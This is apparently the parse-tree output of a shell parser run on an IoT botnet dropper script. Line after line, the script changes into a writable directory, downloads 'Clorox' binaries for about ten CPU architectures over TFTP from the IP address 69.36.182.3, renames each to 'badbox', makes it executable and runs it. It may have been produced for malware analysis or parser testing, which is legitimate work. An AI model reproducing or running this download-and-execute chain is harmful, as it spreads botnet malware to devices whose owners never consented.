CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 183), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 139), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 120), word='69.36.182.3'),
    WordNode(lineno=4, pos=(121, 123), word='-c'),
    WordNode(lineno=4, pos=(124, 127), word='get'),
    WordNode(lineno=4, pos=(128, 139), word='Clorox.mips'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(139, 140)),
  CommandNode(lineno=4, pos=(140, 163), parts=[
    WordNode(lineno=4, pos=(140, 143), word='cat'),
    WordNode(lineno=4, pos=(144, 155), word='Clorox.mips'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(157, 163), word='badbox'), pos=(156, 163), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(163, 164)),
  CommandNode(lineno=4, pos=(164, 174), parts=[
    WordNode(lineno=4, pos=(164, 169), word='chmod'),
    WordNode(lineno=4, pos=(170, 172), word='+x'),
    WordNode(lineno=4, pos=(173, 174), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(174, 175)),
  CommandNode(lineno=4, pos=(175, 183), parts=[
    WordNode(lineno=4, pos=(175, 183), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(184, 318), parts=[
  CommandNode(lineno=5, pos=(184, 191), parts=[
    WordNode(lineno=5, pos=(184, 186), word='cd'),
    WordNode(lineno=5, pos=(187, 191), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(192, 194)),
  CommandNode(lineno=5, pos=(195, 206), parts=[
    WordNode(lineno=5, pos=(195, 197), word='cd'),
    WordNode(lineno=5, pos=(198, 206), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(207, 209)),
  CommandNode(lineno=5, pos=(210, 217), parts=[
    WordNode(lineno=5, pos=(210, 212), word='cd'),
    WordNode(lineno=5, pos=(213, 217), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(218, 220)),
  CommandNode(lineno=5, pos=(221, 229), parts=[
    WordNode(lineno=5, pos=(221, 223), word='cd'),
    WordNode(lineno=5, pos=(224, 229), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(230, 232)),
  CommandNode(lineno=5, pos=(233, 237), parts=[
    WordNode(lineno=5, pos=(233, 235), word='cd'),
    WordNode(lineno=5, pos=(236, 237), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(237, 238)),
  CommandNode(lineno=5, pos=(239, 274), parts=[
    WordNode(lineno=5, pos=(239, 243), word='tftp'),
    WordNode(lineno=5, pos=(244, 255), word='69.36.182.3'),
    WordNode(lineno=5, pos=(256, 258), word='-c'),
    WordNode(lineno=5, pos=(259, 262), word='get'),
    WordNode(lineno=5, pos=(263, 274), word='Clorox.mpsl'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(274, 275)),
  CommandNode(lineno=5, pos=(275, 298), parts=[
    WordNode(lineno=5, pos=(275, 278), word='cat'),
    WordNode(lineno=5, pos=(279, 290), word='Clorox.mpsl'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(292, 298), word='badbox'), pos=(291, 298), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(298, 299)),
  CommandNode(lineno=5, pos=(299, 309), parts=[
    WordNode(lineno=5, pos=(299, 304), word='chmod'),
    WordNode(lineno=5, pos=(305, 307), word='+x'),
    WordNode(lineno=5, pos=(308, 309), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(309, 310)),
  CommandNode(lineno=5, pos=(310, 318), parts=[
    WordNode(lineno=5, pos=(310, 318), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(319, 451), parts=[
  CommandNode(lineno=6, pos=(319, 326), parts=[
    WordNode(lineno=6, pos=(319, 321), word='cd'),
    WordNode(lineno=6, pos=(322, 326), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(327, 329)),
  CommandNode(lineno=6, pos=(330, 341), parts=[
    WordNode(lineno=6, pos=(330, 332), word='cd'),
    WordNode(lineno=6, pos=(333, 341), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(342, 344)),
  CommandNode(lineno=6, pos=(345, 352), parts=[
    WordNode(lineno=6, pos=(345, 347), word='cd'),
    WordNode(lineno=6, pos=(348, 352), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(353, 355)),
  CommandNode(lineno=6, pos=(356, 364), parts=[
    WordNode(lineno=6, pos=(356, 358), word='cd'),
    WordNode(lineno=6, pos=(359, 364), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(365, 367)),
  CommandNode(lineno=6, pos=(368, 372), parts=[
    WordNode(lineno=6, pos=(368, 370), word='cd'),
    WordNode(lineno=6, pos=(371, 372), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(372, 373)),
  CommandNode(lineno=6, pos=(374, 408), parts=[
    WordNode(lineno=6, pos=(374, 378), word='tftp'),
    WordNode(lineno=6, pos=(379, 390), word='69.36.182.3'),
    WordNode(lineno=6, pos=(391, 393), word='-c'),
    WordNode(lineno=6, pos=(394, 397), word='get'),
    WordNode(lineno=6, pos=(398, 408), word='Clorox.sh4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(408, 409)),
  CommandNode(lineno=6, pos=(409, 431), parts=[
    WordNode(lineno=6, pos=(409, 412), word='cat'),
    WordNode(lineno=6, pos=(413, 423), word='Clorox.sh4'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(425, 431), word='badbox'), pos=(424, 431), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(431, 432)),
  CommandNode(lineno=6, pos=(432, 442), parts=[
    WordNode(lineno=6, pos=(432, 437), word='chmod'),
    WordNode(lineno=6, pos=(438, 440), word='+x'),
    WordNode(lineno=6, pos=(441, 442), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(442, 443)),
  CommandNode(lineno=6, pos=(443, 451), parts=[
    WordNode(lineno=6, pos=(443, 451), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(452, 584), parts=[
  CommandNode(lineno=7, pos=(452, 459), parts=[
    WordNode(lineno=7, pos=(452, 454), word='cd'),
    WordNode(lineno=7, pos=(455, 459), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(460, 462)),
  CommandNode(lineno=7, pos=(463, 474), parts=[
    WordNode(lineno=7, pos=(463, 465), word='cd'),
    WordNode(lineno=7, pos=(466, 474), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(475, 477)),
  CommandNode(lineno=7, pos=(478, 485), parts=[
    WordNode(lineno=7, pos=(478, 480), word='cd'),
    WordNode(lineno=7, pos=(481, 485), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(486, 488)),
  CommandNode(lineno=7, pos=(489, 497), parts=[
    WordNode(lineno=7, pos=(489, 491), word='cd'),
    WordNode(lineno=7, pos=(492, 497), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(498, 500)),
  CommandNode(lineno=7, pos=(501, 505), parts=[
    WordNode(lineno=7, pos=(501, 503), word='cd'),
    WordNode(lineno=7, pos=(504, 505), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(505, 506)),
  CommandNode(lineno=7, pos=(507, 541), parts=[
    WordNode(lineno=7, pos=(507, 511), word='tftp'),
    WordNode(lineno=7, pos=(512, 523), word='69.36.182.3'),
    WordNode(lineno=7, pos=(524, 526), word='-c'),
    WordNode(lineno=7, pos=(527, 530), word='get'),
    WordNode(lineno=7, pos=(531, 541), word='Clorox.x86'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(541, 542)),
  CommandNode(lineno=7, pos=(542, 564), parts=[
    WordNode(lineno=7, pos=(542, 545), word='cat'),
    WordNode(lineno=7, pos=(546, 556), word='Clorox.x86'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(558, 564), word='badbox'), pos=(557, 564), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(564, 565)),
  CommandNode(lineno=7, pos=(565, 575), parts=[
    WordNode(lineno=7, pos=(565, 570), word='chmod'),
    WordNode(lineno=7, pos=(571, 573), word='+x'),
    WordNode(lineno=7, pos=(574, 575), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(575, 576)),
  CommandNode(lineno=7, pos=(576, 584), parts=[
    WordNode(lineno=7, pos=(576, 584), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(585, 717), parts=[
  CommandNode(lineno=8, pos=(585, 592), parts=[
    WordNode(lineno=8, pos=(585, 587), word='cd'),
    WordNode(lineno=8, pos=(588, 592), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(593, 595)),
  CommandNode(lineno=8, pos=(596, 607), parts=[
    WordNode(lineno=8, pos=(596, 598), word='cd'),
    WordNode(lineno=8, pos=(599, 607), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(608, 610)),
  CommandNode(lineno=8, pos=(611, 618), parts=[
    WordNode(lineno=8, pos=(611, 613), word='cd'),
    WordNode(lineno=8, pos=(614, 618), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(619, 621)),
  CommandNode(lineno=8, pos=(622, 630), parts=[
    WordNode(lineno=8, pos=(622, 624), word='cd'),
    WordNode(lineno=8, pos=(625, 630), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(631, 633)),
  CommandNode(lineno=8, pos=(634, 638), parts=[
    WordNode(lineno=8, pos=(634, 636), word='cd'),
    WordNode(lineno=8, pos=(637, 638), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(638, 639)),
  CommandNode(lineno=8, pos=(640, 674), parts=[
    WordNode(lineno=8, pos=(640, 644), word='tftp'),
    WordNode(lineno=8, pos=(645, 656), word='69.36.182.3'),
    WordNode(lineno=8, pos=(657, 659), word='-c'),
    WordNode(lineno=8, pos=(660, 663), word='get'),
    WordNode(lineno=8, pos=(664, 674), word='Clorox.arm'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(674, 675)),
  CommandNode(lineno=8, pos=(675, 697), parts=[
    WordNode(lineno=8, pos=(675, 678), word='cat'),
    WordNode(lineno=8, pos=(679, 689), word='Clorox.arm'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(691, 697), word='badbox'), pos=(690, 697), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(697, 698)),
  CommandNode(lineno=8, pos=(698, 708), parts=[
    WordNode(lineno=8, pos=(698, 703), word='chmod'),
    WordNode(lineno=8, pos=(704, 706), word='+x'),
    WordNode(lineno=8, pos=(707, 708), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(708, 709)),
  CommandNode(lineno=8, pos=(709, 717), parts=[
    WordNode(lineno=8, pos=(709, 717), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(718, 850), parts=[
  CommandNode(lineno=9, pos=(718, 725), parts=[
    WordNode(lineno=9, pos=(718, 720), word='cd'),
    WordNode(lineno=9, pos=(721, 725), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(726, 728)),
  CommandNode(lineno=9, pos=(729, 740), parts=[
    WordNode(lineno=9, pos=(729, 731), word='cd'),
    WordNode(lineno=9, pos=(732, 740), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(741, 743)),
  CommandNode(lineno=9, pos=(744, 751), parts=[
    WordNode(lineno=9, pos=(744, 746), word='cd'),
    WordNode(lineno=9, pos=(747, 751), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(752, 754)),
  CommandNode(lineno=9, pos=(755, 763), parts=[
    WordNode(lineno=9, pos=(755, 757), word='cd'),
    WordNode(lineno=9, pos=(758, 763), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(764, 766)),
  CommandNode(lineno=9, pos=(767, 771), parts=[
    WordNode(lineno=9, pos=(767, 769), word='cd'),
    WordNode(lineno=9, pos=(770, 771), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(771, 772)),
  CommandNode(lineno=9, pos=(773, 807), parts=[
    WordNode(lineno=9, pos=(773, 777), word='tftp'),
    WordNode(lineno=9, pos=(778, 789), word='69.36.182.3'),
    WordNode(lineno=9, pos=(790, 792), word='-c'),
    WordNode(lineno=9, pos=(793, 796), word='get'),
    WordNode(lineno=9, pos=(797, 807), word='Clorox.pcc'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(807, 808)),
  CommandNode(lineno=9, pos=(808, 830), parts=[
    WordNode(lineno=9, pos=(808, 811), word='cat'),
    WordNode(lineno=9, pos=(812, 822), word='Clorox.pcc'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(824, 830), word='badbox'), pos=(823, 830), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(830, 831)),
  CommandNode(lineno=9, pos=(831, 841), parts=[
    WordNode(lineno=9, pos=(831, 836), word='chmod'),
    WordNode(lineno=9, pos=(837, 839), word='+x'),
    WordNode(lineno=9, pos=(840, 841), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(841, 842)),
  CommandNode(lineno=9, pos=(842, 850), parts=[
    WordNode(lineno=9, pos=(842, 850), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(851, 985), parts=[
  CommandNode(lineno=10, pos=(851, 858), parts=[
    WordNode(lineno=10, pos=(851, 853), word='cd'),
    WordNode(lineno=10, pos=(854, 858), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(859, 861)),
  CommandNode(lineno=10, pos=(862, 873), parts=[
    WordNode(lineno=10, pos=(862, 864), word='cd'),
    WordNode(lineno=10, pos=(865, 873), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(874, 876)),
  CommandNode(lineno=10, pos=(877, 884), parts=[
    WordNode(lineno=10, pos=(877, 879), word='cd'),
    WordNode(lineno=10, pos=(880, 884), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(885, 887)),
  CommandNode(lineno=10, pos=(888, 896), parts=[
    WordNode(lineno=10, pos=(888, 890), word='cd'),
    WordNode(lineno=10, pos=(891, 896), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(897, 899)),
  CommandNode(lineno=10, pos=(900, 904), parts=[
    WordNode(lineno=10, pos=(900, 902), word='cd'),
    WordNode(lineno=10, pos=(903, 904), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(904, 905)),
  CommandNode(lineno=10, pos=(906, 941), parts=[
    WordNode(lineno=10, pos=(906, 910), word='tftp'),
    WordNode(lineno=10, pos=(911, 922), word='69.36.182.3'),
    WordNode(lineno=10, pos=(923, 925), word='-c'),
    WordNode(lineno=10, pos=(926, 929), word='get'),
    WordNode(lineno=10, pos=(930, 941), word='Clorox.i686'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(941, 942)),
  CommandNode(lineno=10, pos=(942, 965), parts=[
    WordNode(lineno=10, pos=(942, 945), word='cat'),
    WordNode(lineno=10, pos=(946, 957), word='Clorox.i686'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(959, 965), word='badbox'), pos=(958, 965), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(965, 966)),
  CommandNode(lineno=10, pos=(966, 976), parts=[
    WordNode(lineno=10, pos=(966, 971), word='chmod'),
    WordNode(lineno=10, pos=(972, 974), word='+x'),
    WordNode(lineno=10, pos=(975, 976), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(976, 977)),
  CommandNode(lineno=10, pos=(977, 985), parts=[
    WordNode(lineno=10, pos=(977, 985), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(986, 1120), parts=[
  CommandNode(lineno=11, pos=(986, 993), parts=[
    WordNode(lineno=11, pos=(986, 988), word='cd'),
    WordNode(lineno=11, pos=(989, 993), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(994, 996)),
  CommandNode(lineno=11, pos=(997, 1008), parts=[
    WordNode(lineno=11, pos=(997, 999), word='cd'),
    WordNode(lineno=11, pos=(1000, 1008), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1009, 1011)),
  CommandNode(lineno=11, pos=(1012, 1019), parts=[
    WordNode(lineno=11, pos=(1012, 1014), word='cd'),
    WordNode(lineno=11, pos=(1015, 1019), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1020, 1022)),
  CommandNode(lineno=11, pos=(1023, 1031), parts=[
    WordNode(lineno=11, pos=(1023, 1025), word='cd'),
    WordNode(lineno=11, pos=(1026, 1031), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1032, 1034)),
  CommandNode(lineno=11, pos=(1035, 1039), parts=[
    WordNode(lineno=11, pos=(1035, 1037), word='cd'),
    WordNode(lineno=11, pos=(1038, 1039), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1039, 1040)),
  CommandNode(lineno=11, pos=(1041, 1076), parts=[
    WordNode(lineno=11, pos=(1041, 1045), word='tftp'),
    WordNode(lineno=11, pos=(1046, 1057), word='69.36.182.3'),
    WordNode(lineno=11, pos=(1058, 1060), word='-c'),
    WordNode(lineno=11, pos=(1061, 1064), word='get'),
    WordNode(lineno=11, pos=(1065, 1076), word='Clorox.i586'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1076, 1077)),
  CommandNode(lineno=11, pos=(1077, 1100), parts=[
    WordNode(lineno=11, pos=(1077, 1080), word='cat'),
    WordNode(lineno=11, pos=(1081, 1092), word='Clorox.i586'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1094, 1100), word='badbox'), pos=(1093, 1100), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1100, 1101)),
  CommandNode(lineno=11, pos=(1101, 1111), parts=[
    WordNode(lineno=11, pos=(1101, 1106), word='chmod'),
    WordNode(lineno=11, pos=(1107, 1109), word='+x'),
    WordNode(lineno=11, pos=(1110, 1111), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1111, 1112)),
  CommandNode(lineno=11, pos=(1112, 1120), parts=[
    WordNode(lineno=11, pos=(1112, 1120), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1121, 1255), parts=[
  CommandNode(lineno=12, pos=(1121, 1128), parts=[
    WordNode(lineno=12, pos=(1121, 1123), word='cd'),
    WordNode(lineno=12, pos=(1124, 1128), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1129, 1131)),
  CommandNode(lineno=12, pos=(1132, 1143), parts=[
    WordNode(lineno=12, pos=(1132, 1134), word='cd'),
    WordNode(lineno=12, pos=(1135, 1143), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1144, 1146)),
  CommandNode(lineno=12, pos=(1147, 1154), parts=[
    WordNode(lineno=12, pos=(1147, 1149), word='cd'),
    WordNode(lineno=12, pos=(1150, 1154), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1155, 1157)),
  CommandNode(lineno=12, pos=(1158, 1166), parts=[
    WordNode(lineno=12, pos=(1158, 1160), word='cd'),
    WordNode(lineno=12, pos=(1161, 1166), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1167, 1169)),
  CommandNode(lineno=12, pos=(1170, 1174), parts=[
    WordNode(lineno=12, pos=(1170, 1172), word='cd'),
    WordNode(lineno=12, pos=(1173, 1174), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1174, 1175)),
  CommandNode(lineno=12, pos=(1176, 1211), parts=[
    WordNode(lineno=12, pos=(1176, 1180), word='tftp'),
    WordNode(lineno=12, pos=(1181, 1192), word='69.36.182.3'),
    WordNode(lineno=12, pos=(1193, 1195), word='-c'),
    WordNode(lineno=12, pos=(1196, 1199), word='get'),
    WordNode(lineno=12, pos=(1200, 1211), word='Clorox.m68k'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1211, 1212)),
  CommandNode(lineno=12, pos=(1212, 1235), parts=[
    WordNode(lineno=12, pos=(1212, 1215), word='cat'),
    WordNode(lineno=12, pos=(1216, 1227), word='Clorox.m68k'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1229, 1235), word='badbox'), pos=(1228, 1235), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1235, 1236)),
  CommandNode(lineno=12, pos=(1236, 1246), parts=[
    WordNode(lineno=12, pos=(1236, 1241), word='chmod'),
    WordNode(lineno=12, pos=(1242, 1244), word='+x'),
    WordNode(lineno=12, pos=(1245, 1246), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1246, 1247)),
  CommandNode(lineno=12, pos=(1247, 1255), parts=[
    WordNode(lineno=12, pos=(1247, 1255), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1256, 1388), parts=[
  CommandNode(lineno=13, pos=(1256, 1263), parts=[
    WordNode(lineno=13, pos=(1256, 1258), word='cd'),
    WordNode(lineno=13, pos=(1259, 1263), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1264, 1266)),
  CommandNode(lineno=13, pos=(1267, 1278), parts=[
    WordNode(lineno=13, pos=(1267, 1269), word='cd'),
    WordNode(lineno=13, pos=(1270, 1278), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1279, 1281)),
  CommandNode(lineno=13, pos=(1282, 1289), parts=[
    WordNode(lineno=13, pos=(1282, 1284), word='cd'),
    WordNode(lineno=13, pos=(1285, 1289), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1290, 1292)),
  CommandNode(lineno=13, pos=(1293, 1301), parts=[
    WordNode(lineno=13, pos=(1293, 1295), word='cd'),
    WordNode(lineno=13, pos=(1296, 1301), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1302, 1304)),
  CommandNode(lineno=13, pos=(1305, 1309), parts=[
    WordNode(lineno=13, pos=(1305, 1307), word='cd'),
    WordNode(lineno=13, pos=(1308, 1309), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1309, 1310)),
  CommandNode(lineno=13, pos=(1311, 1345), parts=[
    WordNode(lineno=13, pos=(1311, 1315), word='tftp'),
    WordNode(lineno=13, pos=(1316, 1327), word='69.36.182.3'),
    WordNode(lineno=13, pos=(1328, 1330), word='-c'),
    WordNode(lineno=13, pos=(1331, 1334), word='get'),
    WordNode(lineno=13, pos=(1335, 1345), word='Clorox.spc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1345, 1346)),
  CommandNode(lineno=13, pos=(1346, 1368), parts=[
    WordNode(lineno=13, pos=(1346, 1349), word='cat'),
    WordNode(lineno=13, pos=(1350, 1360), word='Clorox.spc'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1362, 1368), word='badbox'), pos=(1361, 1368), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1368, 1369)),
  CommandNode(lineno=13, pos=(1369, 1379), parts=[
    WordNode(lineno=13, pos=(1369, 1374), word='chmod'),
    WordNode(lineno=13, pos=(1375, 1377), word='+x'),
    WordNode(lineno=13, pos=(1378, 1379), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1379, 1380)),
  CommandNode(lineno=13, pos=(1380, 1388), parts=[
    WordNode(lineno=13, pos=(1380, 1388), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1389, 1521), parts=[
  CommandNode(lineno=14, pos=(1389, 1396), parts=[
    WordNode(lineno=14, pos=(1389, 1391), word='cd'),
    WordNode(lineno=14, pos=(1392, 1396), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1397, 1399)),
  CommandNode(lineno=14, pos=(1400, 1411), parts=[
    WordNode(lineno=14, pos=(1400, 1402), word='cd'),
    WordNode(lineno=14, pos=(1403, 1411), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1412, 1414)),
  CommandNode(lineno=14, pos=(1415, 1422), parts=[
    WordNode(lineno=14, pos=(1415, 1417), word='cd'),
    WordNode(lineno=14, pos=(1418, 1422), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1423, 1425)),
  CommandNode(lineno=14, pos=(1426, 1434), parts=[
    WordNode(lineno=14, pos=(1426, 1428), word='cd'),
    WordNode(lineno=14, pos=(1429, 1434), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1435, 1437)),
  CommandNode(lineno=14, pos=(1438, 1442), parts=[
    WordNode(lineno=14, pos=(1438, 1440), word='cd'),
    WordNode(lineno=14, pos=(1441, 1442), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1442, 1443)),
  CommandNode(lineno=14, pos=(1444, 1478), parts=[
    WordNode(lineno=14, pos=(1444, 1448), word='tftp'),
    WordNode(lineno=14, pos=(1449, 1460), word='69.36.182.3'),
    WordNode(lineno=14, pos=(1461, 1463), word='-c'),
    WordNode(lineno=14, pos=(1464, 1467), word='get'),
    WordNode(lineno=14, pos=(1468, 1478), word='Clorox.pcc'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1478, 1479)),
  CommandNode(lineno=14, pos=(1479, 1501), parts=[
    WordNode(lineno=14, pos=(1479, 1482), word='cat'),
    WordNode(lineno=14, pos=(1483, 1493), word='Clorox.pcc'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1495, 1501), word='badbox'), pos=(1494, 1501), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1501, 1502)),
  CommandNode(lineno=14, pos=(1502, 1512), parts=[
    WordNode(lineno=14, pos=(1502, 1507), word='chmod'),
    WordNode(lineno=14, pos=(1508, 1510), word='+x'),
    WordNode(lineno=14, pos=(1511, 1512), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1512, 1513)),
  CommandNode(lineno=14, pos=(1513, 1521), parts=[
    WordNode(lineno=14, pos=(1513, 1521), word='./badbox'),
  ]),
])
